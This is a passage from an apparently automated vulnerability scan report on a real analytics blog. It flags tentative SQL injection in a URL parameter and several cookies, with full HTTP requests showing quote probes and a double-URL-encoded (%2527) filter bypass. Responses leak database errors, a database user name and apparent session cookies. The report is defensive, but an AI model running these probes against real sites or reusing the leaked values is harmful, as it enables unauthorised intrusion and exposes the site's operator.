<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.100. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html'?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:36:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html''?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:36:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:36:32 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:36:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.101. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.102. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:58 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:14:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.103. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.104. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:13:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:13:35 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:13:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:13:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.105. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:16:31 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:16:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.106. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:20:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:20:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
